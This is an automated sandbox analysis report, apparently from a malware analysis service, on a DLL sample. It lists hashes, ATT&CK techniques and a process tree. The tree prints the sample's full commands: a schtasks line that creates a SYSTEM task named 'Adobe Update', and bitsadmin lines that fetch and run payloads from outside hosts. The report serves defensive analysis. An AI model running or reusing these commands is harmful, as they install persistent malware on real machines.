14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c

General

Target

14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll
Size

287KB
MD5

4229afc39bf9aa81526a270a3c8ee7f1
SHA1

dd04a8e9e9fc03ff31fc059c8b4350166586eabe
SHA256

14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c
SHA512

7227b26de1621132e09a1f9ffa4bf8dfdf1d50737c23f5825587013b94a4dd2ea990c7283c56236cb44a9b5e9dbc141507e138f15414132adc8ad30698dbf3a6
SSDEEP

3072:F0+LyPPPvvcSRYun5wGUacVrmR6kIJKYrAjH/ltU9mZdyEWgwxAOTwEhZZ/jPqD0:DLyXtSun5E/jtPuhWgQ/LXjiUQCUB

Score

3^/10

Malware Config

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1996 268 WerFault.exe rundll32.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1076 schtasks.exe
Download via BitsAdmin 1 TTPs 4 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid process

608 bitsadmin.exe
1636 bitsadmin.exe
976 bitsadmin.exe
1556 bitsadmin.exe

pid	pid_target	process	target process
1996	268	WerFault.exe	rundll32.exe

pid	process
1076	schtasks.exe

pid	process
608	bitsadmin.exe
1636	bitsadmin.exe
976	bitsadmin.exe
1556	bitsadmin.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

rundll32.exerundll32.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 268	432	rundll32.exe	rundll32.exe
PID 268 wrote to memory of 1012	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1012	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1012	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1012	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1568	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1568	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1568	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1568	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1840	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1840	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1840	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1840	268	rundll32.exe	cmd.exe
PID 1012 wrote to memory of 1076	1012	cmd.exe	schtasks.exe
PID 1012 wrote to memory of 1076	1012	cmd.exe	schtasks.exe
PID 1012 wrote to memory of 1076	1012	cmd.exe	schtasks.exe
PID 1012 wrote to memory of 1076	1012	cmd.exe	schtasks.exe
PID 268 wrote to memory of 1760	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1760	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1760	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1760	268	rundll32.exe	cmd.exe
PID 1568 wrote to memory of 608	1568	cmd.exe	bitsadmin.exe
PID 1568 wrote to memory of 608	1568	cmd.exe	bitsadmin.exe
PID 1568 wrote to memory of 608	1568	cmd.exe	bitsadmin.exe
PID 1568 wrote to memory of 608	1568	cmd.exe	bitsadmin.exe
PID 268 wrote to memory of 512	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 512	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 512	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 512	268	rundll32.exe	cmd.exe
PID 268 wrote to memory of 1996	268	rundll32.exe	WerFault.exe
PID 268 wrote to memory of 1996	268	rundll32.exe	WerFault.exe
PID 268 wrote to memory of 1996	268	rundll32.exe	WerFault.exe
PID 268 wrote to memory of 1996	268	rundll32.exe	WerFault.exe
PID 512 wrote to memory of 1556	512	cmd.exe	bitsadmin.exe
PID 512 wrote to memory of 1556	512	cmd.exe	bitsadmin.exe
PID 512 wrote to memory of 1556	512	cmd.exe	bitsadmin.exe
PID 512 wrote to memory of 1556	512	cmd.exe	bitsadmin.exe
PID 1840 wrote to memory of 1636	1840	cmd.exe	bitsadmin.exe
PID 1840 wrote to memory of 1636	1840	cmd.exe	bitsadmin.exe
PID 1840 wrote to memory of 1636	1840	cmd.exe	bitsadmin.exe
PID 1840 wrote to memory of 1636	1840	cmd.exe	bitsadmin.exe
PID 1760 wrote to memory of 976	1760	cmd.exe	bitsadmin.exe
PID 1760 wrote to memory of 976	1760	cmd.exe	bitsadmin.exe
PID 1760 wrote to memory of 976	1760	cmd.exe	bitsadmin.exe
PID 1760 wrote to memory of 976	1760	cmd.exe	bitsadmin.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll,#1
2⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg %TEMP%\b001.cpl &%TEMP%\b001.cpl" /ru SYSTEM /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg C:\Users\Admin\AppData\Local\Temp\b001.cpl &C:\Users\Admin\AppData\Local\Temp\b001.cpl" /ru SYSTEM /f
4⤵
- Creates scheduled task(s)
PID:1076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
4⤵
- Download via BitsAdmin
PID:608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
3⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
4⤵
- Download via BitsAdmin
PID:1636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
4⤵
- Download via BitsAdmin
PID:976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 268 -s 336
3⤵
- Program crash
PID:1996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
3⤵
- Suspicious use of WriteProcessMemory
PID:512

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
4⤵
- Download via BitsAdmin
PID:1556

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

BITS Jobs

1

T1197

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-55-0x00000000759F1000-0x00000000759F3000-memory.dmp

Filesize
8KB

Download
memory/268-56-0x0000000000190000-0x00000000001DD000-memory.dmp

Filesize
308KB

Download
memory/268-54-0x0000000000000000-mapping.dmp

Download
memory/512-63-0x0000000000000000-mapping.dmp

Download
memory/608-62-0x0000000000000000-mapping.dmp

Download
memory/976-68-0x0000000000000000-mapping.dmp

Download
memory/1012-57-0x0000000000000000-mapping.dmp

Download
memory/1076-60-0x0000000000000000-mapping.dmp

Download
memory/1556-66-0x0000000000000000-mapping.dmp

Download
memory/1568-58-0x0000000000000000-mapping.dmp

Download
memory/1636-67-0x0000000000000000-mapping.dmp

Download
memory/1760-61-0x0000000000000000-mapping.dmp

Download
memory/1840-59-0x0000000000000000-mapping.dmp

Download
memory/1996-65-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads